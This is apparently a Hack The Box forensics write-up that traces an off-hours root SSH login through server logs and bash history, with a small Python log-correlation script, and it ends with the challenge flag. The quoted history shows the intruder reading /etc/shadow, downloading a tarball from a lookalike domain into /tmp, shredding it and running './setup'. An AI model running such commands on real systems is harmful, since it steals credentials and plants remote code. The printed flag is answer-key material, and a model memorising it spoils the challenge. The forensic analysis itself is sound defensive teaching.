An unusual sighting
We are given the following files:
$ file *
bash_history.txt: ASCII text
sshd.log: ASCII text
These are files from a server. The bash_history.txt file holds the history of commands executed in Bash, while the sshd.log file is a log of events related to SSH sessions.
We have a remote instance in which we must answer some questions:
$ nc 94.237.51.149 43642
+---------------------+---------------------------------------------------------------------------------------------------------------------+
| Title | Description |
+---------------------+---------------------------------------------------------------------------------------------------------------------+
| An unusual sighting | As the preparations come to an end, and The Fray draws near each day, |
| | our newly established team has started work on refactoring the new CMS application for the competition. |
| | However, after some time we noticed that a lot of our work mysteriously has been disappearing! |
| | We managed to extract the SSH Logs and the Bash History from our dev server in question. |
| | The faction that manages to uncover the perpetrator will have a massive bonus come the competition! |
| | |
| | Note: Operating Hours of Korp: 0900 - 1900 |
+---------------------+---------------------------------------------------------------------------------------------------------------------+
Note 2: All timestamps are in the format they appear in the logs
Question 1
What is the IP Address and Port of the SSH Server (IP:PORT)
This question is quite easy to answer, because we see many occurrences of this IP and port in the sshd.log file:
[2024-01-19 12:59:11] Server listening on 0.0.0.0 port 2221.
[2024-01-19 12:59:11] Server listening on :: port 2221.
[2024-01-28 15:24:23] Connection from 100.72.1.95 port 47721 on 100.107.36.130 port 2221 rdomain ""
...
So the server is at 100.107.36.130 and listens on port 2221 for SSH connections:
> 100.107.36.130:2221
[+] Correct!
Question 2
What time is the first successful Login
The first successful login is this one, because it says "Accepted password for root":
...
[2024-02-13 11:29:50] Connection from 100.81.51.199 port 63172 on 100.107.36.130 port 2221 rdomain ""
[2024-02-13 11:29:50] Failed publickey for root from 100.81.51.199 port 63172 ssh2: ECDSA SHA256:NdSnAx2935O7s2KX4LyvIV0gCzzQW5eXYoiiIBosqNE
[2024-02-13 11:29:50] Accepted password for root from 100.81.51.199 port 63172 ssh2
[2024-02-13 11:29:50] Starting session: shell on pts/2 for root from 100.81.51.199 port 63172 id 0
...
> 2024-02-13 11:29:50
[+] Correct!
Question 3
What is the time of the unusual Login
The unusual login is the following one, because it logs in as root, it happens at 04:00, outside the 0900 - 1900 operating hours stated in the note, and the connection comes from an IP address that is very different from the ones seen elsewhere in the SSH log:
...
[2024-02-19 04:00:14] Connection from 2.67.182.119 port 60071 on 100.107.36.130 port 2221 rdomain ""
[2024-02-19 04:00:14] Failed publickey for root from 2.67.182.119 port 60071 ssh2: ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4
[2024-02-19 04:00:14] Accepted password for root from 2.67.182.119 port 60071 ssh2
[2024-02-19 04:00:14] Starting session: shell on pts/2 for root from 2.67.182.119 port 60071 id 0
[2024-02-19 04:38:17] syslogin_perform_logout: logout() returned an error
[2024-02-19 04:38:17] Received disconnect from 2.67.182.119 port 60071:11: disconnected by user
[2024-02-19 04:38:17] Disconnected from user root 2.67.182.119 port 60071
...
> 2024-02-19 04:00:14
[+] Correct!
Question 4
What is the Fingerprint of the attacker's public key
The fingerprint of the public key can be taken from the previous evidence:
...
[2024-02-19 04:00:14] Failed publickey for root from 2.67.182.119 port 60071 ssh2: ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4
...
> OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4
[+] Correct!
Question 5
What is the first command the attacker executed after logging in
Now we need to analyze the commands executed by the attacker, so we have to use the bash_history.txt file, looking for the commands run around the previous timestamp (2024-02-19 04:00:14):
...
[2024-02-16 14:40:47] python ./server.py --tests
[2024-02-19 04:00:18] whoami
[2024-02-19 04:00:20] uname -a
[2024-02-19 04:00:40] cat /etc/passwd
[2024-02-19 04:01:01] cat /etc/shadow
[2024-02-19 04:01:15] ps faux
[2024-02-19 04:02:27] wget https://gnu-packages.com/prebuilts/iproute2/latest.tar.gz -O /tmp/latest_iproute.tar.gz
[2024-02-19 04:10:02] tar xvf latest.tar.gz
[2024-02-19 04:12:02] shred -zu latest.tar.gz
[2024-02-19 04:14:02] ./setup
[2024-02-20 11:11:14] nvim server.py
...
So the first command is whoami:
> whoami
[+] Correct!
Question 6
What is the final command the attacker executed before logging out
And the answer to this question already appears in the previous output, which is ./setup:
> ./setup
[+] Correct!
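The whole investigation (off-hours login, the key fingerprint offered before the password, and the first and last command inside the session window) can be automated with a small parser that correlates sshd.log with bash_history.txt. This is an added example, not part of the original write-up: the sample lines are constructed from the excerpts above (the disconnect line for the 2024-02-13 session is invented to close it), and the 0900-1900 window comes from the challenge note.

```python
import re
from datetime import datetime, time

# Constructed sample input: values copied from the write-up; the 2024-02-13 disconnect is invented.
SSHD_LOG = """\
[2024-02-13 11:29:50] Accepted password for root from 100.81.51.199 port 63172 ssh2
[2024-02-13 11:45:02] Disconnected from user root 100.81.51.199 port 63172
[2024-02-19 04:00:14] Failed publickey for root from 2.67.182.119 port 60071 ssh2: ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4
[2024-02-19 04:00:14] Accepted password for root from 2.67.182.119 port 60071 ssh2
[2024-02-19 04:38:17] Disconnected from user root 2.67.182.119 port 60071
"""
BASH_HISTORY = """\
[2024-02-16 14:40:47] python ./server.py --tests
[2024-02-19 04:00:18] whoami
[2024-02-19 04:01:15] ps faux
[2024-02-19 04:14:02] ./setup
[2024-02-20 11:11:14] nvim server.py
"""
TS = r"\[(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\]"
ACCEPTED = re.compile(TS + r" Accepted \w+ for (\S+) from (\S+) port (\d+)")
DISCONNECT = re.compile(TS + r" Disconnected from user (\S+) (\S+) port (\d+)")
FAILED_KEY = re.compile(TS + r" Failed publickey for \S+ from (\S+) port (\d+) .*SHA256:(\S+)")
HISTORY = re.compile(TS + r" (.*)")

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def sessions(log):
    # Pair each accepted login with its disconnect (same ip:port); keep the key fingerprint offered first.
    open_, fps, out = {}, {}, []
    for line in log.splitlines():
        if m := FAILED_KEY.match(line):
            fps[(m[2], m[3])] = m[4]
        elif m := ACCEPTED.match(line):
            open_[(m[3], m[4])] = (parse_ts(m[1]), m[2])
        elif (m := DISCONNECT.match(line)) and (m[3], m[4]) in open_:
            start, user = open_.pop((m[3], m[4]))
            out.append({"user": user, "ip": m[3], "start": start, "end": parse_ts(m[1]),
                        "fingerprint": fps.get((m[3], m[4]))})
    return out

def session_commands(sess, history):
    # bash_history.txt entries whose timestamp falls inside the session window
    return [m[2] for m in map(HISTORY.match, history.splitlines())
            if m and sess["start"] <= parse_ts(m[1]) <= sess["end"]]

def find_unusual(log=SSHD_LOG, history=BASH_HISTORY, start=time(9), end=time(19)):
    # Korp operating hours from the challenge note are 0900-1900; a login outside them is unusual
    return [dict(s, commands=session_commands(s, history))
            for s in sessions(log) if not start <= s["start"].time() < end]
```

Running find_unusual() on the real files flags only the 04:00:14 session, and its commands list gives the first (whoami) and last (./setup) command directly.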
Flag
At this point, we have the flag:
[+] Here is the flag: HTB{4n_unusual_s1ght1ng_1n_SSH_l0gs!}